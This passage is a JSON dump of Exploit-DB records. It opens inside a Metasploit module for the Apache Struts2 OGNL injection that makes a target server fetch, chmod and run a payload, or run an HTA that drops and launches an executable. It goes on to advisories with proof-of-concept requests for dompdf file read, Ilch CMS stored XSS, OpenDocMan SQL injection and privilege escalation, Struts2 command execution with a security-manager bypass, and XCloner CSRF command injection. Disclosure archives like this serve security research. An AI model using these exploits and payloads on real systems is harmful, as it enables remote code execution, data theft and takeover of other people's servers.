end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27135/"}, {"lastseen": "2016-02-03T18:16:14", "osvdbidlist": ["106083"], "references": [], "description": "dompdf 0.6.0 (dompdf.php read param) - Arbitrary File Read. CVE-2014-2383. Webapps exploit for php platform", "edition": 1, "reporter": "Portcullis", "published": "2014-04-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "exploitdb", "title": "dompdf 0.6.0 dompdf.php read param - Arbitrary File Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2383"], "modified": "2014-04-24T00:00:00", "id": "EDB-ID:33004", "href": "https://www.exploit-db.com/exploits/33004/", "sourceData": "Vulnerability title: Arbitrary file read in dompdf\r\nCVE: CVE-2014-2383\r\nVendor: dompdf\r\nProduct: dompdf\r\nAffected version: v0.6.0\r\nFixed version: v0.6.1 (partial fix)\r\nReported by: Alejo Murillo Moyas\r\n\r\nDetails:\r\nAn arbitrary file read vulnerability is present on dompdf.php file that\r\nallows remote or local attackers to read local files using a special\r\ncrafted argument. This vulnerability requires the configuration flag\r\nDOMPDF_ENABLE_PHP to be enabled (which is disabled by default).\r\n\r\nUsing PHP protocol and wrappers it is possible to bypass the dompdf's\r\n\"chroot\" protection (DOMPDF_CHROOT) which prevents dompdf from accessing\r\nsystem files or other files on the webserver. Please note that the flag\r\nDOMPDF_ENABLE_REMOTE needs to be enabled.\r\n\r\nCommand line interface:\r\nphp dompdf.php\r\nphp://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n\r\nWeb interface:\r\n \r\nhttp://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33004/"}, {"lastseen": "2016-02-03T16:07:13", "osvdbidlist": ["103355"], "references": [], "edition": 1, "description": "Ilch CMS 2.0 - Persistent XSS Vulnerability. CVE-2014-1944. Webapps exploit for php platform", "reporter": "High-Tech Bridge SA", "published": "2014-03-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "Ilch CMS 2.0 - Persistent XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1944"], "modified": "2014-03-05T00:00:00", "id": "EDB-ID:32076", "href": "https://www.exploit-db.com/exploits/32076/", "sourceData": "Advisory ID: HTB23203\r\nProduct: Ilch CMS\r\nVendor: http://ilch.de\r\nVulnerable Version(s): 2.0 and probably prior\r\nTested Version: 2.0\r\nAdvisory Publication: February 12, 2014 [without technical details]\r\nVendor Notification: February 12, 2014\r\nPublic Disclosure: March 5, 2014\r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-1944\r\nRisk Level: Medium\r\nCVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application.\r\n\r\n1) Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"text\" HTTP POST parameter passed to \"/index.php/guestbook/index/newentry\" URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in user\u00e2??s browser in context of the vulnerable website when the victim visits the \"http://[host]/index.php/guestbook/index/index\" URL.\r\n\r\nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word:\r\n\r\nPOST /index.php/guestbook/index/newentry HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 151\r\n\r\nilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40emai\r\nl.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert('immuniwweb');</\r\nscript>&saveEntry=Submit\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nFixed by vendor on February 18, 2014 directly in the source code without version modification/new release. Update to the version 2.0 released after February 18, 2014.\r\n\r\nMore Information:\r\nhttps://github.com/IlchCMS/Ilch-2.0/commit/381e15f39d07d3cdf6aaaa25c0f23\r\n21f817935f7\r\nhttps://github.com/IlchCMS/Ilch-2.0/commit/02bb4953c0e21cb8f20e5e91db5e1\r\n5a77fe1a5ce\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23203 - https://www.htbridge.com/advisory/HTB23203 - Cross-Site Scripting (XSS) in Ilch CMS.\r\n[2] Ilch CMS - http://ilch.de - Ilch is an easy to use content management system for clans, communities and homepages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/32076/"}, {"lastseen": "2016-02-03T16:07:02", "osvdbidlist": ["103333"], "references": [], "edition": 1, "description": "OpenDocMan 1.2.7 - Multiple Vulnerabilities. CVE-2014-1945,CVE-2014-2317. Webapps exploit for php platform", "reporter": "High-Tech Bridge SA", "published": "2014-03-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "OpenDocMan 1.2.7 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2317", "CVE-2014-1945"], "modified": "2014-03-05T00:00:00", "id": "EDB-ID:32075", "href": "https://www.exploit-db.com/exploits/32075/", "sourceData": "Advisory ID: HTB23202\r\nProduct: OpenDocMan\r\nVendor: Free Document Management Software\r\nVulnerable Version(s): 1.2.7 and probably prior\r\nTested Version: 1.2.7\r\nAdvisory Publication: February 12, 2014 [without technical details]\r\nVendor Notification: February 12, 2014\r\nVendor Patch: February 24, 2014\r\nPublic Disclosure: March 5, 2014\r\nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]\r\nCVE References: CVE-2014-1945, CVE-2014-1946\r\nRisk Level: High\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.\r\n\r\n1) SQL Injection in OpenDocMan: CVE-2014-1945\r\n\r\nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe exploitation example below displays version of the MySQL server:\r\n\r\nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v\r\nersion%28%29,3,4,5,6,7,8,9\r\n\r\n2) Improper Access Control in OpenDocMan: CVE-2014-1946\r\n\r\nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u00e2??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.\r\n\r\nThe exploitation example below assigns administrative privileges for the current account:\r\n\r\n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"updateuser\" value=\"1\">\r\n<input type=\"hidden\" name=\"admin\" value=\"1\">\r\n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\">\r\n<input type=\"submit\" name=\"login\" value=\"Run\">\r\n</form>\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nUpdate to OpenDocMan v1.2.7.2\r\n\r\nMore Information:\r\nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/\r\nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.\r\n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32075/"}, {"lastseen": "2018-05-24T14:19:50", "osvdbidlist": [], "references": [], "description": "Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection. CVE-2013-2251. Webapps exploit for Multiple platform", "edition": 1, "reporter": "Exploit-DB", "published": "2014-01-14T00:00:00", "title": "Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-05-24T14:19:50", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EDB-ID:44583", "href": "https://www.exploit-db.com/exploits/44583/", "sourceData": "CVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action=\"foo\">\r\n ...\r\n <s:submit value=\"Register\"/>\r\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Resopnse Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n is appeared in Location response header. As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44583/"}, {"lastseen": "2016-02-03T17:47:55", "osvdbidlist": ["104604"], "references": [], "description": "XCloner Standalone 3.5 - CSRF Vulnerability. CVE-2014-2579,CVE-2014-2996. Webapps exploit for php platform", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "XCloner Standalone 3.5 - CSRF Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2579", "CVE-2014-2996"], "modified": "2014-04-10T00:00:00", "id": "EDB-ID:32790", "href": "https://www.exploit-db.com/exploits/32790/", "sourceData": "Advisory ID: HTB23207\r\nProduct: XCloner Standalone\r\nVendor: XCloner\r\nVulnerable Version(s): 3.5 and probably prior\r\nTested Version: 3.5\r\nAdvisory Publication: March 14, 2014 [without technical details]\r\nVendor Notification: March 14, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2579\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Standalone, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the website.\r\n\r\n\r\n1. \u0421ross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2579\r\n\r\n1.1 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator\u2019s password.\r\n\r\nThe exploitation example below changes password for user 'login' to 'immuniweb':\r\n\r\n\r\n<form action=\"http://[host]/index2.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"jcuser\" value=\"login\">\r\n<input type=\"hidden\" name=\"jcpass\" value=\"password\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"config\">\r\n<input type=\"hidden\" name=\"action\" value=\"save\">\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n</form>\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and execute arbitrary system commands on vulnerable system with privileges of the webserver.\r\n\r\nThe exploitation example below uses the 'echo' system command to write 'immuniweb' string into file '/var/www/file.php':\r\n\r\nhttp://[host]/index2.php?option=com_cloner&task=generate&bname=1&dbbackup=1&cron_access=1&dbbackup_comp=||%20echo immuniweb > /var/www/file.php%20||\r\n\r\nSuccessful exploitation of this vulnerability requires that options 'enable_db_backup' and 'sql_mem' are enabled in application\u2019s configuration file.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor ignored:\r\n- 6 notifications by email\r\n- 4 notifications via contact form\r\n- 1 notification via twitter. \r\n\r\nCurrently we are not aware of any official solution for this vulnerability. As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via WAF of .htaccess. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23207 - https://www.htbridge.com/advisory/HTB23207 - \u0421ross-Site Request Forgery (CSRF) in XCloner Standalone.\r\n[2] XCloner Standalone - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, 